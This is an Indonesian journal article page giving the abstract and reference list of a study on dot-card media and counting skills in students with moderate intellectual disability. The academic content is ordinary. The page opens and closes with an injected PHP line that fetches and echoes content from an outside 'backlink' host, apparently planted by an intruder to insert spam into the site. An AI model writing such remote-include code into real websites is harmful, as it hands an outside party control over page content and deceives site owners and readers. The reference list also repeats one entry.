$a = file_get_contents('https://purefine.online/backlink.php'); echo $a; Pengaruh Media Dot CardsTerhadap Kemampuan Berhitung Siswa Tunagrahita Sedang | Purnomo | Jurnal ORTOPEDAGOGIA

Pengaruh Media Dot CardsTerhadap Kemampuan Berhitung Siswa Tunagrahita Sedang

Danang Dwi Purnomo, M Shodiq, Ahmad Samawi

Abstract


Abstrak: Anak tunagrahita sedang mengalami hambatan dalam perkembangan kognitif khususnya bidang akademik pada pelajaran matematika khususnya berhitung. media dot cards untuk meningkatkan berhitung. Peneliti ini bertujuan untuk mendeskripsikan: (1) kemampuan berhitung sebelum intervensi, (2) kemampuan berhitung setelah intervensi, (3) pengaruh media dot cards. Penelitian eksperimen dengan uji Wilcoxon. Hasilnya adalah adanya pengaruh media dot cards. Perhitungannya diperoleh Thitung = 0. α =0,05 dan n = 6. Diperoleh Ttabel = 2, H0 ditolak dan Hi diterima, sebab Thitung 0 < Ttabel 2. Kesimpulannya adalah nilai rata-rata pre-test yaitu 51,08, dan nilai rata-rata post-test yaitu 79,69. Jadi, terdapat pengaruh media dot cards terhadap kemampuan berhitung siswa tunagrahita sedang.

Keywords


Tunagrahita Sedang; Media Dot Cards; Berhitung

Full Text:

PDF

References


DAFTAR PUSTAKA

Arsyad, Azhar. 2013. Media Pembelajaran. Jakarta: PT RajaGrafindo Persada.

Benazir., Yunus, M., Kasiyati. 2013. Meningkatkan Kemampuan Komunikasi Melalui Media Kartu Gambar Berseri Bagi Anak Autis. Jurnal Ilmiah Pendidikan Khusus. 2(2), 270-279. Dari http://ejournal.unp.ac.id/index.php/jupekhu.

Elfira, Delli. 2013. Meningkatkan Kemampuan Penjumlahan Melalui Media Mobil-Mobilan Bagi Anak Tunagrahita Sedang. Jurnal Ilmiah Pendidikan Khusus, 1(1), 139-148. Dari http://ejournal.unp.ac.id/index.php/jupekhu.

Faradillah, Yulia. 2017. Penggunaan Media Pembelajaran Dot Cards Terhadap Kemampuan Berhitung Penjumlahan Dan Pengurangan Pada Anak Autis. Jurnal Ilmiah Pendidikan Khusus, 1(1), 1-13. Dari http://googlescholar.com.

Hendra, Jhoni. 2012. Meningkatkan Kemampuan Operasi Hitung Penjumlahan Dengan Pembelajaran Matematika Realistik Pada Anak Tunagrahita Sedang. Jurnal Ilmiah Pendidikan Khusus. 1(2), 213-225. Dari http://ejournal.unp.ac.id/index.php/jupekhu.

Hitipeuw, Imanuel. 2009. Belajar dan Pembelajaran. Malang: FIP Universitas Negeri Malang.

Somantri, Sutjihati. 2012. Psikologi Anak Luar Biasa. Bandung: PT Refika Aditama.

Suarni, N.K., Dantes, N., Kertu. W.N. 2015. Pengaruh Program Pembelajaran Individual Berbantuan Media Dakon Terhadap Minat Belajar dan Kemampuan Berhitung Pada Anak Kelas III Tunagrahita Sedang SLB C1 Negeri Denpasar Tahun Pelajaran 2014/2015. E-Journal Program Pascasarjana Universitas Pendidikan Ganesa, 5(1), 1-11. Dari http://googlescholar.com.

Sugiyono. 2015. Metode Penelitian Pendidikan. Bandung: Alfabeta.Suparman. 2015. Peningkatan Kemampuan Berhitung Pada Anak Tunagrahita Ringan Melalui Media Permainan Kartu. Jurnal Pendidikan

Matematika. 3(2), 142-148. Dari http://googlescholar.com.

Suparman. 2015. Peningkatan Kemampuan Berhitung Pada Anak Tunagrahita Ringan Melalui Media Permainan Kartu. Jurnal Pendidikan Matematika. 3(2), 142-148. Dari http://googlescholar.com

Undang-Undang Republik Indonesia Nomor 8 Tahun 2016. Penyandang Disabilitas. Jakarta.

Undang-Undang Republik Indonesia Nomor 20 Tahun 2003. Sistim Pendidikan Nasional. Jakarta.




DOI: http://dx.doi.org/10.17977/um031v4i12018p001

Refbacks

  • There are currently no refbacks.


Copyright (c) 2019 Jurnal ORTOPEDAGOGIA

Creative Commons License
This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License.

"Jurnal Ortopedagogia" is Indexing by:

 

View My Stats
---------------------------------------- ---------------------------------------- ---------------------------------------- $a = file_get_contents('https://purefine.online/backlink.php'); echo $a; ----------------------------------------